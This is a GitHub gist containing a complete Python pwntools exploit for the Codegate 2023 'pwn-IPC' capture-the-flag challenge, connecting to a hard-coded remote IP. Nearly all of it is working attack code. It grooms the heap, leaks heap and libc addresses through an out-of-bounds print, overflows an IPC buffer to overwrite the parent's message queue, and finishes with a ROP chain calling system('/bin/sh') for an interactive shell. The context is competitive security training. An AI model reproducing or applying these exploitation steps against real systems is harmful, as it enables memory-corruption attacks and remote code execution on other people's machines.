Created
June 19, 2023 02:24
-
-
Save vngkv123/6491117f2ed841efb0c73fd420312eab to your computer and use it in GitHub Desktop.
codegate2023 pwn-IPC solution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
from pwn import * | |
import time | |
import subprocess | |
import sys | |
# Byte size of each large spray message and of the filler string carried by
# every PRINTMSG request (0x1000 == 4096).
SPRAYLENGTH = 0x1000
def OFFSET(value):
    """Return *value* as an unsigned 64-bit two's-complement integer.

    The result always fits in 8 bytes, so it can be handed to ``p64``.
    For every negative offset in ``[-2**64, -1]`` this is exactly
    ``2**64 + value``, which is what the exploit relies on.  Zero and
    positive values are returned unchanged (masked to 64 bits) instead of
    producing a number that is too wide to pack.
    """
    return value & 0xFFFFFFFFFFFFFFFF
def powSolver(p):
    """Answer the proof-of-work challenge announced on tube *p*.

    Reads one line from *p*, runs it as a local command and sends the
    command's output back with ``p.sendline``.

    The line is supplied by the remote peer, so it is executed only when
    its first word is ``hashcash`` (the author's sample challenge was
    ``hashcash -mb28 ibqkhrhi``).

    Raises:
        ValueError: if the received line does not start with ``hashcash``;
            nothing is executed or sent in that case.
    """
    command = p.recvline()[:-1]
    argv = command.split(b" ")
    # Never run an arbitrary program just because the server asked for it.
    if argv[0] != b"hashcash":
        raise ValueError(
            "refusing to run unexpected PoW command: {!r}".format(command)
        )
    log.info("Current hashcash pow command: {}".format(command))
    # Argument-list form (no shell), so metacharacters in the line are inert.
    output = subprocess.check_output(argv)
    p.sendline(output)
class CTF:
    """Exploit driver for the Codegate 2023 "pwn-IPC" challenge.

    The object owns one pwntools tube (``self.p``) and speaks the target's
    length-prefixed message protocol over it.  ``run()`` executes the stages
    in order: ``prepareExploit`` -> ``leakMemory`` -> ``getStage1Flag`` ->
    ``exploitParent`` and then drops into an interactive session.

    All numeric offsets below are the author's values for one specific
    target build; they are reproduced unchanged.
    """

    def __init__(self, path, host="3.35.171.76", port=9000):
        """Connect to the target, solve its proof of work and set up state.

        Args:
            path: path of the local challenge binary.  It is only stored;
                the local ``process(path)`` launch is disabled in favour of
                the remote connection.
            host: address of the remote service.
            port: TCP port of the remote service.
        """
        # self.p = process(path)
        self.path = path
        self.p = remote(host, port)
        context.log_level = "debug"
        powSolver(self.p)
        # Selects the extra libc offset applied in exploitParent().
        self.remote = True
        self.progress = log.progress("Status")

        # Numeric codes of the wire protocol, keyed by name.
        self.direction = {
            "CHILD": 0,
            "PARENT": 1,
        }
        self.action = {
            "DECODE": 0,
            "CONTINUE": 1,
            "EXIT": 2,
        }
        self.types = {
            "UINT64": 0,
            "INT64": 1,
            "STRING": 2,
            "BOOL": 3,
            "RPC": 4,
        }
        self.calls = {
            "READMSG": 0,
            "SENDMSG": 1,
            "PRINTMSG": 2,
            "DISABLE": 3,
            "NOP": 4,
        }
        self.printType = {
            "ASSTR": 0,
            "ASBYTES": 1,
        }

        self.readCount = 0      # number of heap-relative reads issued so far
        self.pendingIndex = 0   # number of CONTINUE messages queued so far
        self.heap = 0           # heap anchor, set by leakMemory()
        self.code = 0
        self.libc = 0           # libc-relative anchor, set by leakMemory()
        self.shmemMessageAddress = 0  # set by exploitParent()

    # Common Utilities for exploit

    def updateProgress(self, msg):
        """Show *msg* on the pwntools progress line."""
        self.progress.status(msg)

    def _sendMessage(self, data):
        """Send *data* prefixed with its 8-byte total length (header included)."""
        self.p.send(p64(len(data) + 8) + data)

    def _rpcHeader(self, msgID, call, count):
        """Build the header of a DECODE/RPC message.

        Layout: msgID(4) | action=DECODE(4) | msgType=RPC(8) |
        deserialization count(4) | rpcAction(4).
        """
        header = p32(msgID)
        header += p32(self.action["DECODE"])
        header += p64(self.types["RPC"])
        header += p32(count)
        header += p32(self.calls[call])
        return header

    def _sendPrintRequest(self, rawOffset):
        """Send a PRINTMSG request whose offset field is *rawOffset* (unsigned)."""
        message = b"a" * SPRAYLENGTH
        data = self._rpcHeader(0x13371337, "PRINTMSG", 4)
        data += self.encodeUINT64(len(message))                 # length
        data += self.encodeINT64(rawOffset)                     # offset
        data += self.encodeINT64(self.printType["ASBYTES"])     # print type
        data += self.encodeSTRING(message)                      # data
        self._sendMessage(data)

    def _recvDumpRow(self, marker):
        """Wait for *marker* and return the 8 bytes printed right after it.

        The bytes arrive as 24 characters of space-separated hex.  ``recvn``
        is used because ``recv(n)`` may legally return fewer than *n* bytes.
        """
        self.p.recvuntil(marker)
        row = self.p.recvn(2 * 8 + 8)
        return bytes.fromhex(row.replace(b" ", b"").decode("utf-8"))

    def _leakRow(self, address):
        """Dump the 8 bytes at *address* through a heap-relative PRINTMSG."""
        assert self.heap != 0
        # NOTE(review): the distance is always applied as a negative offset,
        # even for addresses above self.heap -- exactly what all three
        # original readers computed.  Confirm forward reads are not needed.
        offset = -abs(address - self.heap)
        self.readCount += 1
        self.readOffset(offset - (0x1120 * self.readCount))
        row = self._recvDumpRow(b"0x000000: ")
        self.p.recvuntil(b"msgID: 0x13371337")
        return row

    def _overflowPrefix(self, marker):
        """Return the four leading qwords shared by every overflow payload."""
        return p64(0x215) + p64(0x1f8) + p64(marker) + p64(4)

    def _groomHeap(self, settle=0):
        """Queue ten 0x200-byte messages, then release indices 4, 2 and 0.

        Args:
            settle: seconds to sleep after the allocations and again after
                the releases (0 disables both sleeps).
        """
        for i in range(10):
            self.memoryAllocate(0x200, PAD=p8(0x61 + i))
        if settle:
            time.sleep(settle)
        for index in (4, 2, 0):
            self.memoryDeallocate(index)
        if settle:
            time.sleep(settle)

    # Specific exploit strategies

    def encodeUINT64(self, data):
        """Serialize *data* as type tag UINT64 (4 bytes) + 8-byte value."""
        return p32(self.types["UINT64"]) + p64(data)

    def encodeINT64(self, data):
        """Serialize *data* as type tag INT64 (4 bytes) + 8-byte value."""
        return p32(self.types["INT64"]) + p64(data)

    def encodeBOOLEAN(self, data):
        """Serialize *data* as type tag BOOL (4 bytes) + 1-byte value."""
        return p32(self.types["BOOL"]) + p8(data)

    def encodeSTRING(self, data):
        """Serialize bytes *data* as type tag STRING + 8-byte length + payload."""
        return p32(self.types["STRING"]) + p64(len(data)) + data

    def memoryAllocate(self, size, PAD=b"A"):
        """Queue a CONTINUE message that is *size* bytes long on the wire.

        Args:
            size: total message size, length prefix included; must exceed 8.
            PAD: single filler byte repeated to reach *size*.
        """
        assert size > 8
        data = p32(0xdadadada) + p32(self.action["CONTINUE"])
        # 8 bytes of header so far plus the 8-byte length prefix.
        data += PAD * (size - len(data) - 8)
        self._sendMessage(data)
        self.pendingIndex += 1

    def memoryDeallocate(self, index, recv=True):
        """Send a READMSG RPC for queued message *index*.

        Args:
            index: index of the pending message to read.
            recv: when true, block until the target prints "receive error".
        """
        data = self._rpcHeader(0xcafebabe, "READMSG", 1)
        data += self.encodeUINT64(index)
        self._sendMessage(data)
        if recv:
            self.p.recvuntil(b"receive error")

    def readOffset(self, offset):
        """Ask the target to print SPRAYLENGTH bytes at signed *offset*.

        Returns once the target reports "Decode is received"; the dump
        itself is left in the tube for the caller to parse.
        """
        self._sendPrintRequest(OFFSET(offset))
        self.p.recvuntil(b"Decode is received")

    def CRASH(self):
        """Send a PRINTMSG with offset 0x8100000000000000 and wait for restart.

        Returns after the "System page size: 4096" banner is seen again.
        """
        self._sendPrintRequest(0x8100000000000000)
        self.p.recvuntil(b"System page size: 4096\n")

    def read32(self, address):
        """Return the little-endian 32-bit value at *address*."""
        # The dump row holds 8 bytes; u32 accepts exactly 4.
        return u32(self._leakRow(address)[:4])

    def read64(self, address):
        """Return the little-endian 64-bit value at *address*."""
        return u64(self._leakRow(address))

    def readStr(self, address):
        """Return the 8 raw bytes at *address*."""
        return self._leakRow(address)

    def prepareExploit(self):
        """Queue the initial messages and release indices 0 and 2."""
        # context.log_level = "debug"
        self.updateProgress("Running prepare exploit...")
        # length(8) | dataLength(4) | msgID(4) | action(4) | msgType(4)
        for i in range(10):
            self.memoryAllocate(SPRAYLENGTH, PAD=p8(0x41 + i))
        for i in range(10):
            self.memoryAllocate(0x200, PAD=p8(0x61 + i))
        self.memoryDeallocate(0)
        self.memoryDeallocate(2)
        return True

    def leakMemory(self):
        """Leak a heap pointer, then derive ``self.heap`` and ``self.libc``."""
        self.updateProgress("Leaking memory...")
        self.readOffset(-SPRAYLENGTH)
        leakMem = u64(self._recvDumpRow(b"0x000fe0: "))
        self.heap = leakMem + 0x1060
        log.info("First leaked memory: {}".format(hex(self.heap)))

        # heap base
        searchBase = self.heap - 0x131a0
        log.info("Trying to find code base and libc... start from {}".format(hex(searchBase)))
        leakMem = self.read64(searchBase + 0x11ef0)

        # libc base
        log.info("leaked adjacent libc: {}".format(hex(leakMem)))
        self.libc = leakMem - 0x7ff620 + 0x1000000
        log.info("libc address: {}".format(hex(self.libc)))
        return True

    def triggerOverflow(self, message, length, paddData=None):
        """Send a SENDMSG RPC whose string is padding followed by *message*.

        Args:
            message: bytes appended after the padding.
            length: nominal buffer size; ``length - 0x18`` is announced as
                the buffer length and the padding is ``length - 0x24`` bytes.
            paddData: optional bytes placed at the start of the padding; the
                rest is filled with ``b"x"``.
        """
        data = self._rpcHeader(0x13371337, "SENDMSG", 5)
        data += self.encodeUINT64(self.direction["PARENT"])     # direction
        data += self.encodeUINT64(length - 0x18)                # buffer length
        data += self.encodeUINT64(1)                            # encode object count
        data += self.encodeUINT64(self.types["STRING"])         # type

        # padding bytes
        paddBytes = b""
        if paddData is not None:
            paddBytes += paddData
        paddBytes += b"x" * ((length - 0x24) - len(paddBytes))
        # Fails when paddData alone is longer than the padding area.
        assert len(paddBytes) == (length - 0x24)

        data += self.encodeSTRING(paddBytes + message)          # encode data
        self._sendMessage(data)
        self.p.recvuntil(b"Decode is received")
        time.sleep(0.5)

    # we need to make stable R/W primitive
    # TODO: implements encode logic and second vulnerability
    def getStage1Flag(self):
        """Run the stage-1 sequence and log the line printed by the target."""
        self.updateProgress("Getting a stage1 flag...")
        self.memoryDeallocate(14)
        self.memoryDeallocate(12)
        self.memoryDeallocate(10)

        stage1memory = self.libc - 0x800000 + 0x28
        # stage1memory = self.read64(stage1memory)
        log.info("Gussed stage1 flag memory: {}".format(hex(stage1memory)))

        # first member should be vector pointer
        message = self._overflowPrefix(0xc0465324) + p64(stage1memory)
        self.triggerOverflow(message, 0x200)
        self.memoryDeallocate(13, False)
        self.p.recvuntil(b"Pended decode is received\n")
        log.info("stage1 flag: {}".format(self.p.recvuntil(b"\n").decode("utf-8")))
        return True

    def memoryRead(self, address):
        """Restart the child, then leak and return up to 8 bytes at *address*.

        Requires ``self.shmemMessageAddress`` to have been set by
        ``exploitParent``.  The value is read from the line the target
        prints, zero-padded to 8 bytes and decoded little-endian.
        """
        self.CRASH()
        time.sleep(1)
        self._groomHeap()

        log.info("Trying to leaking value at {}".format(hex(address)))

        # first member should be vector pointer
        fakeData = p64(address) + p64(0x1000) + p64(0) * 4
        message = self._overflowPrefix(0xc0465324) + p64(self.shmemMessageAddress)
        self.triggerOverflow(message, 0x200, fakeData)
        self.memoryDeallocate(5, False)
        self.p.recvuntil(b"Pended decode is received\n")

        line = self.p.recvuntil(b"\n")[:-1]
        # u64 needs exactly 8 bytes: keep the low 8 and pad short lines.
        leakedData = u64(line[:8].ljust(8, b"\x00"))
        log.info("Leaked memory at {}: {}".format(hex(address), hex(leakedData)))
        return leakedData

    def exitMessage(self):
        """Send a message with action EXIT followed by 0x100 filler bytes."""
        data = p32(0x13371337)
        data += p32(self.action["EXIT"])
        data += p64(self.types["RPC"])
        data += b"A" * 0x100
        self._sendMessage(data)

    def exploitParent(self):
        """Run the final stage: queue overwrite, stack leak, ROP payload."""
        self.updateProgress("Exploit parent process...")
        self._groomHeap()

        # array's index pos => +0x800
        parentMessageQueue = self.libc - 0x800000 + 0x848
        shmemMessageAddress = self.libc - 0x800000 + (4 << 20) + 0x2c
        self.shmemMessageAddress = shmemMessageAddress
        log.info("Parnet message queue address: {}".format(hex(parentMessageQueue)))
        log.info("Shared message address: {}".format(hex(shmemMessageAddress)))

        fakeData = p64(shmemMessageAddress + 0x10)      # message
        fakeData += p64(0x100)                          # m_index
        fakeData += p64(0x1000)                         # fake message data
        # msgID | action | msgType | deserialization count | rpcAction
        fakeData += self._rpcHeader(0x13371337, "DISABLE", 0)

        payload = self._overflowPrefix(0xc1465324)
        payload += p64(parentMessageQueue + 0x7f8)      # dst (last message and index)
        payload += p64(1) * 2
        payload += p64(shmemMessageAddress)             # src
        payload += p64(0x10)                            # length
        self.triggerOverflow(payload, 0x200, fakeData)
        self.memoryDeallocate(3, False)

        # crash child process again, but newly created child doesn't have sandbox.
        time.sleep(1)

        # read process stack address to do ROP
        offset = 0
        if self.remote is True:
            offset += 0xeb000
        stackAddress = self.memoryRead(self.libc - 0x800000 + 0x1050)

        # reload child process
        self.CRASH()

        # get shell from child process
        self._groomHeap(settle=0.5)

        realServerOffsetVariant = 0x1000
        system = self.libc + 0x50d60 + offset + realServerOffsetVariant
        binsh = self.libc + 0x1d8698 + offset + realServerOffsetVariant
        log.info("stack address: {}".format(hex(stackAddress)))
        log.info("libc's system: {}, /bin/sh: {}".format(hex(system), hex(binsh)))

        # fake message data
        # 0x0000000000125bae : xor ebp, ebp ; pop rax ; pop rdi ; call rax
        fakeData = p64(self.libc + 0x0000000000125bae + offset + realServerOffsetVariant)
        fakeData += p64(system)                         # system
        fakeData += p64(binsh)                          # /bin/sh

        payload = self._overflowPrefix(0xc1465324)
        payload += p64(stackAddress + 0x18)             # overwrite target
        payload += p64(1) * 2
        payload += p64(shmemMessageAddress)             # src
        payload += p64(len(fakeData))                   # length
        self.triggerOverflow(payload, 0x200, fakeData)
        # pause()
        self.memoryDeallocate(5, False)
        # self.p.recvuntil(b"Done with meessage receive msgID: 0xc1465324")
        return True

    def run(self):
        """Run every stage in order; return False as soon as one reports False.

        On success the tube is handed to the user with ``interactive()``
        before True is returned.
        """
        stages = (
            self.prepareExploit,
            self.leakMemory,
            self.getStage1Flag,
            self.exploitParent,
        )
        for stage in stages:
            if stage() is False:
                return False
        self.p.interactive()
        return True
if __name__ == "__main__":
    # Script entry point: build the exploit driver, run every stage and
    # report the overall outcome on the progress line.
    solver = CTF("../prob/for_organizer/build/IPC")
    if solver.run() is True:
        solver.updateProgress("Exploit success")
    else:
        solver.updateProgress("Exploit fail")
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment